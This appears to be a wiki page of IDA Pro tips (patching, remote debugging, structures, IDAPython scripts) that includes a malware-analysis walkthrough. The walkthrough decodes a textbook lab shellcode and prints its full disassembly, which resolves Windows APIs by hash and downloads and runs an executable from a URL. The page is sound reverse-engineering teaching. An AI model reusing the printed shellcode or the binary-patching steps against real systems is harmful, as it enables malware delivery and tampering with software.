IDA-Pro
Description and installation
Description
IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger.
Installation
Flavors
Recommended installation
It is recommended to install Python 2.7 first and then IDA Pro to avoid errors with PySide.QtGui.
- Install python 2.7.9 for Windows 7 x64.
- Install IDA Pro. When prompted, check "Install python 2.7". It will ensure python will be supported by IDA Pro.
- To install plugins, refer to this section.
Usage
Display opcodes
If you want to display opcodes along with the assembly, go to Options > General and fill in the "Number of opcode bytes" as follows:
Here is the result once the option applied:
Patching
Patch code from IDA
You can patch an executable from IDA Pro directly. Go to the location you want to patch, right click and make sure Hex view is synchronized:
From the IDA View, click on the instruction to modify and go to the Hex view. Right click on the byte to modify and select "Edit" from the menu:
Make your modification, right click on the byte and select "Commit changes" or press F2.
Now, go to File > Produce File > Create DIF file:
Download idadif.py (http://stalkr.net/files/ida/idadif.py) and run it as follows:
C:\tools>idadif.py e7bc5d2c0cf4480348f5504196561297.patched.2 e7bc5d2c0cf4480348f5504196561297.patched.dif Patching file 'e7bc5d2c0cf4480348f5504196561297.patched.2' with 'e7bc5d2c0cf4480348f5504196561297.patched.dif' Done
You can check the differences using the fc utility:
C:\tools>fc /b e7bc5d2c0cf4480348f5504196561297.init e7bc5d2c0cf4480348f5504196561297.patched.2 Comparaison des fichiers e7bc5d2c0cf4480348f5504196561297.init et E7BC5D2C0CF4480348F5504196561297.PATCHED.2 0001F21C: 74 EB
The above output means that 74 has been replaced by EB
NOPing out instructions
The below python script can help NOPing out instructions in IDA Pro (will apply to the instruction where the cursor is). It will also bind the script to the Alt+N key combination.
import idaapi
idaapi.CompileLine('static n_key() { RunPythonStatement("nopIt()"); }')
AddHotkey("Alt-N", "n_key")
def nopIt():
start = ScreenEA()
end = NextHead(start)
for ea in range(start, end):
PatchByte(ea, 0x90)
Jump(end)
Refresh()
Given the below extract, we see at location 0x401215 a jump to itself:
Place the cursor at offset 0x401215 and press D to convert the block to DATA. Then place the cursor at location 0x401216 and press C to convert the block to CODE.
You should now have the below screen.
Place your cursor at offset 0x401215, start the python script (File > Script file...). Press Alt+N to NOP out the byte.
In order that the function is properly displayed in IDA-Pro, press C to convert the byte to CODE:
Remote debugger
Description
There are situations where you would find useful to use the IDA remote debugger (e.g. debug a remote ELF running on Linux, from IDA Pro, installed on a Windows virtual machine).
linux_serverx64
Server part
To do that, go to your IDA installation folder and find the appropriate debugger that will run on the remote server:
File name Target system Debugged programs ------------------ ----------------- ----------------- android_server ARM Android 32-bit ELF files armlinux_server ARM Linux 32-bit ELF files armuclinux_server ARM UCLinux 32-bit ELF files linux_server Linux 32-bit 32-bit ELF files linux_serverx64 Linux 64-bit 64-bit ELF files mac_server Mac OS X 32-bit Mach-O files mac_serverx64 Mac OS X 64-bit Mach-O files win32_remote.exe MS Windows 32-bit 32-bit PE files win64_remotex64.exe MS Windows 64-bit 64-bit PE files wince_remote.dll Windows CE 32-bit PE files
In our case, we will debug a 64bit ELF. Hence, we will copy linux_serverx64 to the remote host. Once done, start it as follows:
$ ./linux_serverx64 -PmyAwesomePassword IDA Linux 64-bit remote debug server(ST) v1.14. Hex-Rays (c) 2004-2011 Listening on port #23946...
Available options are:
- -p<port>
port number. Default to 23946/tcp
- -P<password>
- password
- -v
- verbose
Client configuration
Now, let's open IDA Pro and go to Debugger > Run > Remote Linux debugger:
And configure the screen as follows:
You should have following screen:
Usual commands for debugging:
- F9: run
- F2: breakpoint
- g: go to offset
- F7: step in
- F8: step out
android_server
Refer to this page.
Fix function stack
There are cases where IDA will fail interpreting the size of a variable and you will need to fix the stack. In the below example, IDA did not realize that the size of the buffer is 512 bytes and displayed a local variable labeled var_20C instead:
To fix that, press Ctrl + K or go to Edit > Functions > Stack variables, right click on the first byte of buffer and select "array" from the menu:
Enter 512 in the Array size field and click OK.
Once this modification applied, back to the IDA-View, we can see that the Buffer is now properly labeled:
Add a standard structure
Example 1: IWebBrowser2
There are cases where you will need to add a standard structure. In the below example, we see a call to CoCreateInstance at offset 0x401022:
clsid is Internet Explorer (see details) and rrid corresponds to the IWebBrowser2 interface:
But if we want to know what function is called, we have to add the structure. To do that, go to the Structures tab and press the Insert key. When prompted, enter the structure named, based on the following pattern: InterfaceNameVtbl where InterfaceName is IWebBrowser2 in our case.
In the below code extract, we can see that the reference to the COM object is stored on the stack and moved to EAX at offset 0x40105C. EAX is dereferenced at 0x401065 and EDX points to the beginning of the COM object.
To know what function is called at 0x401074, right click on the offset (0x2C). It appears that it corresponds to the Navigate function:
Example 2: AT_INFO
In the following example (Lab 09-03 from the Practical Malware Analysis book), we have to deal with the AT_INFO structure in the DLL3.dll file:
In DLL3.dll, go to the Structures window, press the Insert key, and add the AT_INFO structure:
The DLL3GetStructure function returns a pointer to the dword_1000B0A0 global variable which is defined in DllMain:
Go to dword_1000B0A0 in memory, select Edit > Struct var... from the menu, and select the AT_INFO structure previously added:
Back to DllMain, the code is now much more readable:
Load with manual Image base address
Manual load
In case you're analyzing a DLL that has been rebased, you will need to manually load the DLL into IDA Pro. To do that, ensure the Manual load option is checked when you're loading the DLL:
You're then prompted to enter the new address:
Rebasing
If the malware is already opened in IDA-Pro, you can rebase it by going to Edit > Segments > Rebase program... and specifying a new address. Below is an example of a malicious driver we want to rebase. The default address is 0x10000 but we know the driver is loaded at the 0xf7be9000 offset. Let's modify the window as follows:
Graphing of several functions
To make a graph of several functions, select the functions or a portion of code and select the desired graph type (from, to, ...). Below is an example. Suppose we want to highlight the relationship between WinINet functions. Let's select several functions and click "Xref Graph to".
Add missing cross references
There are situations where IDA Pro won't be able to detect all cross references (e.g. function pointers). To add missing cross references, use python IDC:
AddCodeXref(loc_from, loc_to, flow_type);
The three parameters are:
- the location the reference is from
- the location the reference is to
- flow type: fl_CF (normal call instruction) or a fl_JF (jump instruction)
Convert bytes to WORDs
We have just decrypted a shellcode into IDA-Pro and we have defined the decrypted stub as CODE (C). However, there are some bytes at the end of the code which are actually DWORDs. They do correspond to shellcode function hashes, as explained here:
To convert these bytes, let's first define them as individual arrays with a size of 4 (press * on the numpad or right click and select Array):
Once this is done, press dd on each of these arrays to convert them to DWORDs:
Plugins
IDA Python Scripting
List of IDC functions
The complete list of IDC functions can be found here.
setcolorssiko.py
You can use the following python script to highlight:
- Call functions
- Non-zeroing XORs (data encoding)
- sidt, sldt, sgdt, smsw, str, in, cpuid (Anti-VM instructions)
- int 3, int 2D, icebp, rdtsc (Anti-Debugging instructions)
- push/ret combinations (return address abuse)
The script is also available here.
from idautils import *
from idc import *
#Color the Calls off-white
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
funcCalls = []
for i in heads:
if GetMnem(i) == "call":
funcCalls.append(i)
print "Number of calls: %d" % (len(funcCalls))
for i in funcCalls:
SetColor(i, CIC_ITEM, 0xc7fdff)
#Color Anti-VM instructions Red and print their location
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
antiVM = []
for i in heads:
if (GetMnem(i) == "sidt" or GetMnem(i) == "sgdt" or GetMnem(i) == "sldt" or GetMnem(i) == "smsw" or GetMnem(i) == "str" or GetMnem(i) == "in" or GetMnem(i) == "cpuid"):
antiVM.append(i)
print "Number of potential Anti-VM instructions: %d" % (len(antiVM))
for i in antiVM:
print "Anti-VM potential at %x" % i
SetColor(i, CIC_ITEM, 0x0000ff)
#Color non-zeroing out xor instructions Orange
heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
xor = []
for i in heads:
if GetMnem(i) == "xor":
if (GetOpnd(i,0) != GetOpnd(i,1)):
xor.append(i)
print "Number of xor: %d" % (len(xor))
for i in xor:
SetColor(i, CIC_ITEM, 0x00a5ff)
Decode XOR strings
You can use python scripts to decode strings (e.g. XOR'ed) into IDA. Here is an extract of a shellcode that decodes a XOR'ed
To decode the XOR'ed stub, we have to patch each byte by XOR'ing with 0x66. To do that, we can use a custom python script as follows:
# decode-xor.py
loc = 0x18FD68 # Start offset of XOR'ed stub
for i in range(0x1DF): # Loop in range 0x00-0x1DF
b = Byte(loc+i) # We save each byte in b
decoded_byte = b ^ 0x66 # XOR byte with 0x66
PatchByte(loc+i, decoded_byte) # Patch each byte with decoded byte
Go to File > Script file... and select decode-xor.py.
IDA will update your code as follows:
You can select the entire block and press the A key to display the string:
Decode shellcode
Description
Given the Lab19-01.bin shellcode from the Practical Malware Analysis book. Let's see how we can decode the encrypted part with a python script.
First of all, we need to identify the shellcode sections:
Section | Address range |
---|---|
NOP sled | 0x00000000 - 0x000001FF |
Decoding stub | 0x00000200 - 0x00000223 |
Encrypted stub | 0x00000224 - 0x000003B0 |
For more information regarding the identification of the sections, refer to this section.
The decryption routine is relatively simple to understand:
seg000:00000200 33 C9 xor ecx, ecx
seg000:00000202 66 B9 8D 01 mov cx, 18Dh ; Size of encrypted stub
seg000:00000206 EB 17 jmp short loc_21F
seg000:00000208
seg000:00000208 ; =============== S U B R O U T I N E =======================================
seg000:00000208
seg000:00000208
seg000:00000208 decode_shellcode proc near
seg000:00000208 5E pop esi ; used as CALL/POP to get address of EIP
seg000:00000209 56 push esi ; push EIP to stack to pass control to decrypted content via retn
seg000:0000020A 8B FE mov edi, esi
seg000:0000020C
seg000:0000020C loc_20C: ; loop thru all bytes of encrypted stub
seg000:0000020C AC lodsb ; 1st character transform
seg000:0000020D 8A D0 mov dl, al
seg000:0000020F 80 EA 41 sub dl, 41h ; 'A' ; substract 0x41
seg000:00000212 C0 E2 04 shl dl, 4 ; and shift left by 4
seg000:00000215 AC lodsb ; 2nd character transform
seg000:00000216 2C 41 sub al, 41h ; 'A' ; substract 0x41
seg000:00000218 02 C2 add al, dl ; sum of both transformations
seg000:0000021A AA stosb ; patch byte with result of transformation
seg000:0000021B 49 dec ecx
seg000:0000021C 75 EE jnz short loc_20C ; end of loop
seg000:0000021E C3 retn
seg000:0000021E decode_shellcode endp
seg000:0000021E
seg000:0000021F ; ---------------------------------------------------------------------------
seg000:0000021F
seg000:0000021F loc_21F: ; CODE XREF: seg000:00000206�j
seg000:0000021F E8 E4 FF FF FF call decode_shellcode
Once the sections have been defined and the decryption routine has been understood, we can create a python script that will decode the bytes, exactly as the shellcode would do in run time.
Script
def shl(dest, count):
return dest << count
def transform_pair(c1, c2):
# substracts 0x41 and shl(4) the 1st char
c1 = shl(c1 - 0x41, 4)
# substracts 0x41 from 2nd character
c2 = c2 - 0x41
# return sum of both transforms
return c1 + c2
# Start of the encrypted stub
loc = 0x00000224
# Loop thru each byte of the encrypted stub
for i in range(0x18D):
b1 = Byte(loc+i*2)
b2 = Byte(loc+i*2+1)
decoded_byte = transform_pair(b1, b2)
PatchByte(loc+i, decoded_byte)
SetColor(loc+i, CIC_ITEM, 0xF8FFB0)
Launch the script from File > Script file....
Arrange code/data
Now, we still need to manually arrange the code, using:
- U for undefined,
- D for data,
- C for code,
- A for ascii.
Below is the result of the fully decoded shellcode:
seg000:00000224 89 E5 mov ebp, esp
seg000:00000226 81 EC 40 00 00 00 sub esp, 40h
seg000:0000022C E9 33 01 00 00 jmp loc_364
seg000:00000231
seg000:00000231 ; =============== S U B R O U T I N E =======================================
seg000:00000231
seg000:00000231
seg000:00000231 sub_231 proc near ; CODE XREF: sub_252+1F�p
seg000:00000231
seg000:00000231 arg_0 = dword ptr 4
seg000:00000231
seg000:00000231 56 push esi
seg000:00000232 57 push edi
seg000:00000233 8B 74 24 0C mov esi, [esp+8+arg_0]
seg000:00000237 31 FF xor edi, edi
seg000:00000239 FC cld
seg000:0000023A
seg000:0000023A loc_23A: ; CODE XREF: sub_231+15�j
seg000:0000023A 31 C0 xor eax, eax
seg000:0000023C AC lodsb
seg000:0000023D 38 E0 cmp al, ah
seg000:0000023F 74 0A jz short loc_24B
seg000:00000241 C1 CF 0D ror edi, 0Dh
seg000:00000244 01 C7 add edi, eax
seg000:00000246 E9 EF FF FF FF jmp loc_23A
seg000:0000024B ; ---------------------------------------------------------------------------
seg000:0000024B
seg000:0000024B loc_24B: ; CODE XREF: sub_231+E�j
seg000:0000024B 89 F8 mov eax, edi
seg000:0000024D 5F pop edi
seg000:0000024E 5E pop esi
seg000:0000024F C2 04 00 retn 4
seg000:0000024F sub_231 endp
seg000:0000024F
seg000:00000252
seg000:00000252 ; =============== S U B R O U T I N E =======================================
seg000:00000252
seg000:00000252
seg000:00000252 sub_252 proc near ; CODE XREF: sub_2BF+E�p
seg000:00000252 ; sub_2BF+1C�p ...
seg000:00000252
seg000:00000252 var_4 = dword ptr -4
seg000:00000252 arg_0 = dword ptr 4
seg000:00000252 arg_4 = dword ptr 8
seg000:00000252
seg000:00000252 60 pusha
seg000:00000253 8B 6C 24 24 mov ebp, [esp+20h+arg_0]
seg000:00000257 8B 45 3C mov eax, [ebp+3Ch]
seg000:0000025A 8B 54 05 78 mov edx, [ebp+eax+78h]
seg000:0000025E 01 EA add edx, ebp
seg000:00000260 8B 4A 18 mov ecx, [edx+18h]
seg000:00000263 8B 5A 20 mov ebx, [edx+20h]
seg000:00000266 01 EB add ebx, ebp
seg000:00000268
seg000:00000268 loc_268: ; CODE XREF: sub_252+28�j
seg000:00000268 E3 2A jecxz short loc_294
seg000:0000026A 49 dec ecx
seg000:0000026B 8B 34 8B mov esi, [ebx+ecx*4]
seg000:0000026E 01 EE add esi, ebp
seg000:00000270 56 push esi
seg000:00000271 E8 BB FF FF FF call sub_231
seg000:00000276 3B 44 24 28 cmp eax, [esp+20h+arg_4]
seg000:0000027A 75 EC jnz short loc_268
seg000:0000027C 8B 5A 24 mov ebx, [edx+24h]
seg000:0000027F 01 EB add ebx, ebp
seg000:00000281 66 8B 0C 4B mov cx, [ebx+ecx*2]
seg000:00000285 8B 5A 1C mov ebx, [edx+1Ch]
seg000:00000288 01 EB add ebx, ebp
seg000:0000028A 8B 04 8B mov eax, [ebx+ecx*4]
seg000:0000028D 01 E8 add eax, ebp
seg000:0000028F E9 02 00 00 00 jmp loc_296
seg000:00000294 ; ---------------------------------------------------------------------------
seg000:00000294
seg000:00000294 loc_294: ; CODE XREF: sub_252:loc_268�j
seg000:00000294 31 C0 xor eax, eax
seg000:00000296
seg000:00000296 loc_296: ; CODE XREF: sub_252+3D�j
seg000:00000296 89 44 24 1C mov [esp+20h+var_4], eax
seg000:0000029A 61 popa
seg000:0000029B C2 08 00 retn 8
seg000:0000029B sub_252 endp
seg000:0000029B
seg000:0000029E
seg000:0000029E ; =============== S U B R O U T I N E =======================================
seg000:0000029E
seg000:0000029E
seg000:0000029E sub_29E proc near ; CODE XREF: sub_2BF+1�p
seg000:0000029E 56 push esi
seg000:0000029F 31 C0 xor eax, eax
seg000:000002A1 64 8B 40 30 mov eax, fs:[eax+30h]
seg000:000002A5 85 C0 test eax, eax
seg000:000002A7 78 0F js short loc_2B8
seg000:000002A9 8B 40 0C mov eax, [eax+0Ch]
seg000:000002AC 8B 70 1C mov esi, [eax+1Ch]
seg000:000002AF AD lodsd
seg000:000002B0 8B 40 08 mov eax, [eax+8]
seg000:000002B3 E9 05 00 00 00 jmp loc_2BD
seg000:000002B8 ; ---------------------------------------------------------------------------
seg000:000002B8
seg000:000002B8 loc_2B8: ; CODE XREF: sub_29E+9�j
seg000:000002B8 ; sub_29E:loc_2B8�j
seg000:000002B8 E9 FB FF FF FF jmp loc_2B8
seg000:000002BD ; ---------------------------------------------------------------------------
seg000:000002BD
seg000:000002BD loc_2BD: ; CODE XREF: sub_29E+15�j
seg000:000002BD 5E pop esi
seg000:000002BE C3 retn
seg000:000002BE sub_29E endp
seg000:000002BE
seg000:000002BF
seg000:000002BF ; =============== S U B R O U T I N E =======================================
seg000:000002BF
seg000:000002BF
seg000:000002BF sub_2BF proc near ; CODE XREF: sub_2BF:loc_364�p
seg000:000002BF 5B pop ebx
seg000:000002C0 E8 D9 FF FF FF call sub_29E
seg000:000002C5 89 C2 mov edx, eax
seg000:000002C7 68 8E 4E 0E EC push 0EC0E4E8Eh
seg000:000002CC 52 push edx
seg000:000002CD E8 80 FF FF FF call sub_252
seg000:000002D2 89 45 FC mov [ebp-4], eax
seg000:000002D5 68 C1 79 E5 B8 push 0B8E579C1h
seg000:000002DA 52 push edx
seg000:000002DB E8 72 FF FF FF call sub_252
seg000:000002E0 89 45 F8 mov [ebp-8], eax
seg000:000002E3 68 83 B9 B5 78 push 78B5B983h
seg000:000002E8 52 push edx
seg000:000002E9 E8 64 FF FF FF call sub_252
seg000:000002EE 89 45 F4 mov [ebp-0Ch], eax
seg000:000002F1 68 E6 17 8F 7B push 7B8F17E6h
seg000:000002F6 52 push edx
seg000:000002F7 E8 56 FF FF FF call sub_252
seg000:000002FC 89 45 F0 mov [ebp-10h], eax
seg000:000002FF 68 98 FE 8A 0E push 0E8AFE98h
seg000:00000304 52 push edx
seg000:00000305 E8 48 FF FF FF call sub_252
seg000:0000030A 89 45 EC mov [ebp-14h], eax
seg000:0000030D 8D 03 lea eax, [ebx]
seg000:0000030F 50 push eax
seg000:00000310 FF 55 FC call dword ptr [ebp-4]
seg000:00000313 68 36 1A 2F 70 push 702F1A36h
seg000:00000318 50 push eax
seg000:00000319 E8 34 FF FF FF call sub_252
seg000:0000031E 89 45 E8 mov [ebp-18h], eax
seg000:00000321 68 80 00 00 00 push 80h ; 'Ç'
seg000:00000326 8D 7B 48 lea edi, [ebx+48h]
seg000:00000329 57 push edi
seg000:0000032A FF 55 F8 call dword ptr [ebp-8]
seg000:0000032D 01 C7 add edi, eax
seg000:0000032F C7 07 5C 31 2E 65 mov dword ptr [edi], 652E315Ch
seg000:00000335 C7 47 04 78 65 00 00 mov dword ptr [edi+4], 6578h
seg000:0000033C 31 C9 xor ecx, ecx
seg000:0000033E 51 push ecx
seg000:0000033F 51 push ecx
seg000:00000340 8D 43 48 lea eax, [ebx+48h]
seg000:00000343 50 push eax
seg000:00000344 8D 43 07 lea eax, [ebx+7]
seg000:00000347 50 push eax
seg000:00000348 51 push ecx
seg000:00000349 FF 55 E8 call dword ptr [ebp-18h]
seg000:0000034C 68 05 00 00 00 push 5
seg000:00000351 8D 43 48 lea eax, [ebx+48h]
seg000:00000354 50 push eax
seg000:00000355 FF 55 EC call dword ptr [ebp-14h]
seg000:00000358 FF 55 F0 call dword ptr [ebp-10h]
seg000:0000035B 68 00 00 00 00 push 0
seg000:00000360 50 push eax
seg000:00000361 FF 55 F4 call dword ptr [ebp-0Ch]
seg000:00000364
seg000:00000364 loc_364: ; CODE XREF: seg000:0000022C�j
seg000:00000364 E8 56 FF FF FF call sub_2BF
seg000:00000364 sub_2BF endp ; sp-analysis failed
seg000:00000364
seg000:00000364 ; ---------------------------------------------------------------------------
seg000:00000369 55 52 4C 4D 4F 4E 00 aUrlmon db 'URLMON',0
seg000:00000370 68 74 74 70 3A 2F 2F 77+aHttpWww_practi db 'http://www.practicalmalwareanalysis.com/shellcode/annoy_user.exe',0
Convert bytes to IP address
The following script will transform bytes to an IP address at the current position:
# Convert to IP address
loc = ScreenEA()
MakeComm(loc, '.'.join([str(Byte(loc+i+1)) for i in range(4)]))
Below is an example:
Comments
Keywords: IDA-Pro reverse-engineering disassembler malware-analysis